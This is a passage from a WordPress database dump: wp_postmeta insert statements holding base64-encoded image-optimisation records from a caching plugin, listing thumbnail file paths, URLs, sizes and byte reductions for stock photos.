bGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE1MTk5NzYtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTUxOTk3Ni0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTIzMywiaWQiOjI0MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTUxOTk3Ni0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNTE5OTc2LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE1MTk5NzYtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkyMzUsImlkIjoyNDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE1MTk5NzYtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTUxOTk3Ni01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNTE5OTc2LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5MjM4LCJpZCI6MjQwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE1MTk5NzYtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTUxOTk3Ni0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNTE5OTc2LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5MjQwLCJpZCI6MjQwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE1MTk5NzYtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTUxOTk3Ni0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNTE5OTc2LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5MjQzLCJpZCI6MjQwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE1MTk5NzYtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTUxOTk3Ni0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNTE5OTc2LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5MjQ1LCJpZCI6MjQwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE1MTk5NzYtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTUxOTk3Ni0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNTE5OTc2LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5MjQ4LCJpZCI6MjQwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE1MTk5NzYtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTUxOTk3Ni00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNTE5OTc2LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5MjUxLCJpZCI6MjQwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE1MTk5NzYtNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTUxOTk3Ni02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNTE5OTc2LTYwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5MjU0LCJpZCI6MjQwfV0='); 
INSERT INTO `wp_postmeta` VALUES (30307, 239, 'wpfc_optimisation_reduction', '103544'); 
INSERT INTO `wp_postmeta` VALUES (30308, 239, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA3NjI3OTMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDc2Mjc5My5qcGciLCJ3aWR0aCI6MzUwNCwiaGVpZ2h0IjoyMzM2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA3NjI3OTMuanBnIiwicmVkdWN0aW9uIjoxMDM1MzAsInRpbWUiOjE0ODM1ODkyNjQsImlkIjoiMjM5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDc2Mjc5My0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wNzYyNzkzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA3NjI3OTMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkyNjYsImlkIjoyMzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA3NjI3OTMtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDc2Mjc5My04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wNzYyNzkzLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5MjcwLCJpZCI6MjM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wNzYyNzkzLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA3NjI3OTMtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDc2Mjc5My03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTI3MywiaWQiOjIzOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDc2Mjc5My0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDc2Mjc5My0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA3NjI3OTMtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTI3NiwiaWQiOjIzOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDc2Mjc5My0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wNzYyNzkzLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA3NjI3OTMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkyNzksImlkIjoyMzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA3NjI3OTMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDc2Mjc5My0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wNzYyNzkzLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5MjgxLCJpZCI6MjM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wNzYyNzkzLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA3NjI3OTMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDc2Mjc5My0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTI4NCwiaWQiOjIzOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDc2Mjc5My01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wNzYyNzkzLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA3NjI3OTMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkyODcsImlkIjoyMzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDc2Mjc5My0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wNzYyNzkzLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA3NjI3OTMtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkyODksImlkIjoyMzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDc2Mjc5My0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wNzYyNzkzLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA3NjI3OTMtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkyOTEsImlkIjoyMzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDc2Mjc5My0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wNzYyNzkzLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA3NjI3OTMtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkyOTQsImlkIjoyMzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDc2Mjc5My0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wNzYyNzkzLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA3NjI3OTMtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkyOTcsImlkIjoyMzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDc2Mjc5My00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wNzYyNzkzLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA3NjI3OTMtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkyOTksImlkIjoyMzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDc2Mjc5My02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wNzYyNzkzLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA3NjI3OTMtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkzMDIsImlkIjoyMzl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30309, 238, 'wpfc_optimisation_reduction', '114269'); 
INSERT INTO `wp_postmeta` VALUES (30310, 238, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA0MDY0MzUuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDQwNjQzNS5qcGciLCJ3aWR0aCI6MzAwMCwiaGVpZ2h0IjoyMDAwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA0MDY0MzUuanBnIiwicmVkdWN0aW9uIjoxMTQyNTUsInRpbWUiOjE0ODM1ODkzMTMsImlkIjoiMjM4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDQwNjQzNS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8wNDA2NDM1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA0MDY0MzUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkzMTUsImlkIjoyMzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzA0MDY0MzUtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMDQwNjQzNS04MDB4NT